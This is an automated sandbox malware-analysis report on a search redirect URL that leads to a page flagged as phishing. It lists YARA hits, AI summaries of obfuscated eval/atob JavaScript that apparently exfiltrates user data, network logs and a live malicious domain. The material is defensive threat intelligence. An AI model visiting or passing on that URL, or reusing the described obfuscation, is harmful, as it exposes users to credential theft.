Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://www.bing.com/ck/a?!&&p=03393a15f6ac2f3e18e9a53e23664491f88e763b1b1f8dfe8ed088a707d16975JmltdHM9MTc0MTA0NjQwMA&ptn=3&ver=2&hsh=4&fclid=2041c032-4fae-62e3-26ce-d55e4e1e63be&u=a1aHR0cHM6Ly93d3cuc3VubmlhY2FkZW15LmNvbS90YWcvcXVyYW4tcGFkaG5hLXNpa2hlLw&ntb=1

Overview

General Information

Sample URL:https://www.bing.com/ck/a?!&&p=03393a15f6ac2f3e18e9a53e23664491f88e763b1b1f8dfe8ed088a707d16975JmltdHM9MTc0MTA0NjQwMA&ptn=3&ver=2&hsh=4&fclid=2041c032-4fae-62e3-26ce-d55e4e1e63be&u=a1aHR0cHM6Ly93d3cuc
Analysis ID:1630087
Infos:

Detection

HTMLPhisher, Invisible JS
Score:68
Range:0 - 100
Confidence:100%

Signatures

Yara detected HtmlPhish44
Yara detected Invisible JS
Yara detected Obfuscation Via HangulCharacter
AI detected suspicious Javascript
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 1556 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6772 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1968,i,15708862942189160107,8136080379522309171,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 2304 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.bing.com/ck/a?!&&p=03393a15f6ac2f3e18e9a53e23664491f88e763b1b1f8dfe8ed088a707d16975JmltdHM9MTc0MTA0NjQwMA&ptn=3&ver=2&hsh=4&fclid=2041c032-4fae-62e3-26ce-d55e4e1e63be&u=a1aHR0cHM6Ly93d3cuc3VubmlhY2FkZW15LmNvbS90YWcvcXVyYW4tcGFkaG5hLXNpa2hlLw&ntb=1" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
SourceRuleDescriptionAuthorStrings
dropped/chromecache_63JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    SourceRuleDescriptionAuthorStrings
    0.3.id.script.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
      0.3.id.script.csvJoeSecurity_InvisibleJSYara detected Invisible JSJoe Security
        0.4.id.script.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
          0.4.id.script.csvJoeSecurity_InvisibleJSYara detected Invisible JSJoe Security
            3.2.pages.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
              Click to see the 1 entries
              No Sigma rule has matched
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              Phishing

              barindex
              Source: Yara matchFile source: dropped/chromecache_63, type: DROPPED
              Source: Yara matchFile source: 0.3.id.script.csv, type: HTML
              Source: Yara matchFile source: 0.4.id.script.csv, type: HTML
              Source: Yara matchFile source: 3.2.pages.csv, type: HTML
              Source: Yara matchFile source: 0.3.id.script.csv, type: HTML
              Source: Yara matchFile source: 0.4.id.script.csv, type: HTML
              Source: Yara matchFile source: 3.2.pages.csv, type: HTML
              Source: 0.4.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://g8c4.aldemeres.com/zBuFL/... This script demonstrates high-risk behavior by using the `eval()` function to execute dynamic code. This allows for the potential execution of malicious code, which poses a significant security risk. Additionally, the script uses obfuscated code, making it difficult to analyze and understand the true intent. Overall, this script should be considered highly suspicious and potentially malicious.
              Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://g8c4.aldemeres.com/zBuFL/... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of `atob` and `decodeURIComponent` to decode and execute remote code is a clear indicator of malicious intent. Additionally, the script appears to be sending user data to an untrusted domain, which poses a significant risk of data theft or other malicious activities. Overall, this script exhibits a high level of suspicion and should be treated as a potential security threat.
              Source: 0.3.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://g8c4.aldemeres.com/zBuFL/... This script demonstrates high-risk behaviors, including dynamic code execution through the use of `eval()` and the `Proxy` object. It also appears to be heavily obfuscated, which is a common tactic used to conceal malicious intent. The combination of these factors suggests a high likelihood of malicious activity, potentially involving data exfiltration or other harmful actions.
              Source: https://www.bing.com/ck/a?!&&p=03393a15f6ac2f3e18e9a53e23664491f88e763b1b1f8dfe8ed088a707d16975JmltdHM9MTc0MTA0NjQwMA&ptn=3&ver=2&hsh=4&fclid=2041c032-4fae-62e3-26ce-d55e4e1e63be&u=a1aHR0cHM6Ly93d3cuc3VubmlhY2FkZW15LmNvbS90YWcvcXVyYW4tcGFkaG5hLXNpa2hlLw&ntb=1HTTP Parser: No favicon
              Source: https://www.sunniacademy.com/tag/quran-padhna-sikhe/HTTP Parser: No favicon
              Source: https://g8c4.aldemeres.com/zBuFL/HTTP Parser: No favicon
              Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
              Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.2
              Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.2
              Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.2
              Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.2
              Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.2
              Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.2
              Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.2
              Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.2
              Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.2
              Source: unknownTCP traffic detected without corresponding DNS query: 184.30.131.245
              Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.2
              Source: unknownTCP traffic detected without corresponding DNS query: 184.30.131.245
              Source: unknownTCP traffic detected without corresponding DNS query: 23.199.214.10
              Source: unknownTCP traffic detected without corresponding DNS query: 23.199.214.10
              Source: unknownTCP traffic detected without corresponding DNS query: 23.199.214.10
              Source: unknownTCP traffic detected without corresponding DNS query: 23.199.214.10
              Source: global trafficHTTP traffic detected: GET /tag/quran-padhna-sikhe/ HTTP/1.1Host: www.sunniacademy.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://www.bing.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /zBuFL/ HTTP/1.1Host: g8c4.aldemeres.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://www.sunniacademy.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: g8c4.aldemeres.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://g8c4.aldemeres.com/zBuFL/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlozNlAxL2J6YzdVeEphWWx3aFF0aFE9PSIsInZhbHVlIjoic09IMU9TM2Z5aEJvaW9hYzF4RXc4OHBnVjh0YnJMMGNxL0RwVFJaalEwbGkzUmRJK1FsVlMrbjN6eTg5eFdXSkhONXBjTnM5aDd3S2NQSWFBbnY1bFF2NU1IbmRDRy9qdDVYZUhhRm0zM05YL2VJWWIxeXlkbDY5U05tSUN2R1MiLCJtYWMiOiJkZWE3ZTEyMGRjNGQxMjYwOTJmY2VmNzUzMWVkN2RlZGRmMjRkMTFiYzZjMjg3YWMyOTFhMzdmZWJmOTgyOTI3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InQzKzlUVytnVlZxQXZ1NG83L3V6UHc9PSIsInZhbHVlIjoiRVVPek9iUGhzRHRhRGRTYkRWWVNndko2N1ZuRS84eVduRjQ4bzBNQXViR01FOWVyTXI2UGZCcDJUWElFWkpvZ3l3L0pMa0xlSUpKSWVrOCtEOVRiUFFKUHNESE43d2tkR2RjcG95ZnVoYTA2ZVBqRjl1VFNRcGY0Um4vc3Jub3MiLCJtYWMiOiIzZWI5NDhkMTQ1NmNiZDExMjkyYjg4OWM2MWZjNzUyN2YwNjIwYzg2Y2FhNTFhOGM2ZTg2MGVlY2M5YTMxNzUyIiwidGFnIjoiIn0%3D
              Source: global trafficDNS traffic detected: DNS query: www.sunniacademy.com
              Source: global trafficDNS traffic detected: DNS query: g8c4.aldemeres.com
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
              Source: unknownHTTP traffic detected: POST /report/v4?s=3Jyejs1ptB8p5DFcqwDCiadSLUk6ujT6dKjyJiObYCd2uQzy9Ph0%2BlkY3OTB72NkMAvNDchhq9bd7v5o68nqkxbl4P6kKZ4yYUm57OsWol2MSaFXnKaI9lDG5IHG8w%3D%3D HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 430Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 13:40:40 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAge: 4170Cache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3Jyejs1ptB8p5DFcqwDCiadSLUk6ujT6dKjyJiObYCd2uQzy9Ph0%2BlkY3OTB72NkMAvNDchhq9bd7v5o68nqkxbl4P6kKZ4yYUm57OsWol2MSaFXnKaI9lDG5IHG8w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=21279&min_rtt=20451&rtt_var=1353&sent=320&recv=109&lost=0&retrans=0&sent_bytes=335480&recv_bytes=13829&delivery_rate=2239202&cwnd=258&unsent_bytes=0&cid=cdf2c7079ba4b2fc&ts=2776&x=0"CF-Cache-Status: HITServer: cloudflareCF-RAY: 91ba06c9fe1341ba-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1746&min_rtt=1729&rtt_var=683&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1899&delivery_rate=1564006&cwnd=220&unsent_bytes=0&cid=ec7311325821c16b&ts=1049&x=0"
              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
              Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
              Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
              Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
              Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
              Source: classification engineClassification label: mal68.phis.win@19/9@8/148
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1968,i,15708862942189160107,8136080379522309171,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.bing.com/ck/a?!&&p=03393a15f6ac2f3e18e9a53e23664491f88e763b1b1f8dfe8ed088a707d16975JmltdHM9MTc0MTA0NjQwMA&ptn=3&ver=2&hsh=4&fclid=2041c032-4fae-62e3-26ce-d55e4e1e63be&u=a1aHR0cHM6Ly93d3cuc3VubmlhY2FkZW15LmNvbS90YWcvcXVyYW4tcGFkaG5hLXNpa2hlLw&ntb=1"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1968,i,15708862942189160107,8136080379522309171,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
              Browser Extensions
              1
              Process Injection
              1
              Masquerading
              OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              Registry Run Keys / Startup Folder
              1
              Registry Run Keys / Startup Folder
              1
              Process Injection
              LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
              Ingress Tool Transfer
              Traffic DuplicationData Destruction

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              https://www.bing.com/ck/a?!&&p=03393a15f6ac2f3e18e9a53e23664491f88e763b1b1f8dfe8ed088a707d16975JmltdHM9MTc0MTA0NjQwMA&ptn=3&ver=2&hsh=4&fclid=2041c032-4fae-62e3-26ce-d55e4e1e63be&u=a1aHR0cHM6Ly93d3cuc3VubmlhY2FkZW15LmNvbS90YWcvcXVyYW4tcGFkaG5hLXNpa2hlLw&ntb=10%Avira URL Cloudsafe
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://a.nel.cloudflare.com/report/v4?s=3Jyejs1ptB8p5DFcqwDCiadSLUk6ujT6dKjyJiObYCd2uQzy9Ph0%2BlkY3OTB72NkMAvNDchhq9bd7v5o68nqkxbl4P6kKZ4yYUm57OsWol2MSaFXnKaI9lDG5IHG8w%3D%3D0%Avira URL Cloudsafe
              https://g8c4.aldemeres.com/favicon.ico0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              a.nel.cloudflare.com
              35.190.80.1
              truefalse
                high
                sunniacademy.com
                65.109.35.46
                truefalse
                  unknown
                  g8c4.aldemeres.com
                  104.21.16.1
                  truetrue
                    unknown
                    www.google.com
                    142.250.186.164
                    truefalse
                      high
                      s-part-0032.t-0009.t-msedge.net
                      13.107.246.60
                      truefalse
                        high
                        www.sunniacademy.com
                        unknown
                        unknownfalse
                          unknown
                          NameMaliciousAntivirus DetectionReputation
                          https://a.nel.cloudflare.com/report/v4?s=3Jyejs1ptB8p5DFcqwDCiadSLUk6ujT6dKjyJiObYCd2uQzy9Ph0%2BlkY3OTB72NkMAvNDchhq9bd7v5o68nqkxbl4P6kKZ4yYUm57OsWol2MSaFXnKaI9lDG5IHG8w%3D%3Dfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.sunniacademy.com/tag/quran-padhna-sikhe/false
                            unknown
                            https://g8c4.aldemeres.com/zBuFL/true
                              unknown
                              https://g8c4.aldemeres.com/favicon.icofalse
                              • Avira URL Cloud: safe
                              unknown
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              142.250.186.46
                              unknownUnited States
                              15169GOOGLEUSfalse
                              142.250.186.78
                              unknownUnited States
                              15169GOOGLEUSfalse
                              104.21.16.1
                              g8c4.aldemeres.comUnited States
                              13335CLOUDFLARENETUStrue
                              1.1.1.1
                              unknownAustralia
                              13335CLOUDFLARENETUSfalse
                              74.125.133.84
                              unknownUnited States
                              15169GOOGLEUSfalse
                              216.58.206.67
                              unknownUnited States
                              15169GOOGLEUSfalse
                              2.23.227.208
                              unknownEuropean Union
                              8781QA-ISPQAfalse
                              239.255.255.250
                              unknownReserved
                              unknownunknownfalse
                              65.109.35.46
                              sunniacademy.comUnited States
                              11022ALABANZA-BALTUSfalse
                              142.250.186.164
                              www.google.comUnited States
                              15169GOOGLEUSfalse
                              35.190.80.1
                              a.nel.cloudflare.comUnited States
                              15169GOOGLEUSfalse
                              142.250.186.99
                              unknownUnited States
                              15169GOOGLEUSfalse
                              IP
                              192.168.2.16
                              192.168.2.18
                              192.168.2.11
                              Joe Sandbox version:42.0.0 Malachite
                              Analysis ID:1630087
                              Start date and time:2025-03-05 14:39:13 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:defaultwindowsinteractivecookbook.jbs
                              Sample URL:https://www.bing.com/ck/a?!&&p=03393a15f6ac2f3e18e9a53e23664491f88e763b1b1f8dfe8ed088a707d16975JmltdHM9MTc0MTA0NjQwMA&ptn=3&ver=2&hsh=4&fclid=2041c032-4fae-62e3-26ce-d55e4e1e63be&u=a1aHR0cHM6Ly93d3cuc3VubmlhY2FkZW15LmNvbS90YWcvcXVyYW4tcGFkaG5hLXNpa2hlLw&ntb=1
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:11
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • EGA enabled
                              Analysis Mode:stream
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal68.phis.win@19/9@8/148
                              • Exclude process from analysis (whitelisted): SIHClient.exe
                              • Excluded IPs from analysis (whitelisted): 13.107.246.60
                              • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net
                              • Not all processes where analyzed, report is missing behavior information
                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              • VT rate limit hit for: https://www.bing.com/ck/a?!&&p=03393a15f6ac2f3e18e9a53e23664491f88e763b1b1f8dfe8ed088a707d16975JmltdHM9MTc0MTA0NjQwMA&ptn=3&ver=2&hsh=4&fclid=2041c032-4fae-62e3-26ce-d55e4e1e63be&u=a1aHR0cHM6Ly93d3cuc3VubmlhY2FkZW15LmNvbS90YWcvcXVyYW4tcGFkaG5hLXNpa2hlLw&ntb=1
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Mar 5 12:40:36 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                              Category:dropped
                              Size (bytes):2673
                              Entropy (8bit):3.975651135707613
                              Encrypted:false
                              SSDEEP:
                              MD5:D95059BAD83802D5FFBF471D3B610BC8
                              SHA1:3584C88A7FE370BF53CBF0A68CD0827C830233F1
                              SHA-256:6722176F436D316FCDEEF4D77A9F8640AB3FD1FD7D88D38173E6813F909F05A0
                              SHA-512:65192887E7E7136D2A68C7384475100D68FC14865546740A5BCE181C2A1FB86335AD76624017A30C27546F17D2FC788EF64C97DF4ECDEA8AB1789491EF5CB44E
                              Malicious:false
                              Reputation:unknown
                              Preview:L..................F.@.. ...$+.,....h.5-...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IeZ.m....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VeZ.m....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VeZ.m....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VeZ.m..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VeZ.m...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............n.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Mar 5 12:40:36 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                              Category:dropped
                              Size (bytes):2675
                              Entropy (8bit):3.9918040515443836
                              Encrypted:false
                              SSDEEP:
                              MD5:2B043FB78A910B0E5FEA8EDA2F448937
                              SHA1:48CEAB7B0782E33F76D730FFC78CE666E09BF19E
                              SHA-256:1935ED8CE5C4948340619F8ACFF75C7700BF6A46AE1D83233AE8284F45C6296B
                              SHA-512:C92F85A5BD31CD4C34712D1BECA484CEDCCD5B94B507EC852165C58146AC033CE5BA17D5A87F080BF2EA82ECE9F1619244BD03E3F75FB3589777DA3C244DB474
                              Malicious:false
                              Reputation:unknown
